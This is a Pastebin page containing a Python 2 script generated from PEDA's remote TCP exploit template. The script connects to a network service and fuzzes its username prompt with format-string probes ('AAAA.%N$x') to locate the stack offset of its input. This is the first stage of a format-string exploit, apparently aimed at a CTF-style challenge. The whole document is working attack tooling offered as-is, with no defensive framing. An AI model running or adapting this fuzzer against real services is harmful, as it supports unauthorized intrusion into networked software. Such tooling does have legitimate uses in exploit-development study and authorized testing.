Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #
- # Template for remote TCP exploit code, generated by PEDA
- #
- import os
- import sys
- import struct
- import resource
- import time
- import re
- def usage():
- print "Usage: %s host port" % sys.argv[0]
- return
- from socket import *
- import telnetlib
- class TCPClient():
- def __init__(self, host, port, debug=0):
- self.debug = debug
- self.sock = socket(AF_INET, SOCK_STREAM)
- self.sock.connect((host, port))
- def debug_log(self, size, data, cmd):
- if self.debug != 0:
- print "%s(%d): %s" % (cmd, size, repr(data))
- def send(self, data, delay=0):
- if delay:
- time.sleep(delay)
- nsend = self.sock.send(data)
- if self.debug > 1:
- self.debug_log(nsend, data, "send")
- return nsend
- def sendline(self, data, delay=0):
- nsend = self.send(data + "\n", delay)
- return nsend
- def recv(self, size=1024, delay=0):
- if delay:
- time.sleep(delay)
- buf = self.sock.recv(size)
- if self.debug > 0:
- self.debug_log(len(buf), buf, "recv")
- return buf
- def recv_until(self, delim):
- buf = ""
- while True:
- c = self.sock.recv(1)
- buf += c
- if delim in buf:
- break
- self.debug_log(len(buf), buf, "recv")
- return buf
- def recvline(self):
- buf = self.recv_until("\n")
- return buf
- def close(self):
- self.sock.close()
- def exploit(host, port):
- index = 0
- done = False
- try:
- # connect
- port = int(port)
- client = TCPClient(host, port, debug=0)
- print '[+] Fuzzer started'
- # max index of 1024
- while index != 1024:
- # recieve username banner and send a crafted formatstring response
- client.recv(1024)
- # increase index starting from 1
- index += 1
- fsr = "AAAA.%{0}$x".format(str(index))
- client.send(fsr + '\n')
- # recieve password banner and send a empty response
- client.recv(1024)
- client.send('\n')
- # recieve email banner and send a empty response
- client.recv(1024)
- client.send('\n')
- # recieve the result message and extract the formatstring response
- # from the username entry
- l = re.findall(r"'(.*?)'", client.recv(1024))
- # if the begin of the stack if found show the info
- if l[0].endswith('41414141'):
- print "[*] stack_index @ {0}".format(str(index))
- done = True
- # recieve the retry message and send 'yes' to continue or 'no' if done
- client.recv(1024)
- if not done:
- client.send('yes\n')
- else:
- client.send('no\n')
- client.close()
- break
- # some insurence
- client.close()
- print '[-] Fuzzer finished'
- except KeyboardInterrupt:
- pass
- if __name__ == "__main__":
- if len(sys.argv) < 3:
- usage()
- else:
- exploit(sys.argv[1], sys.argv[2])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement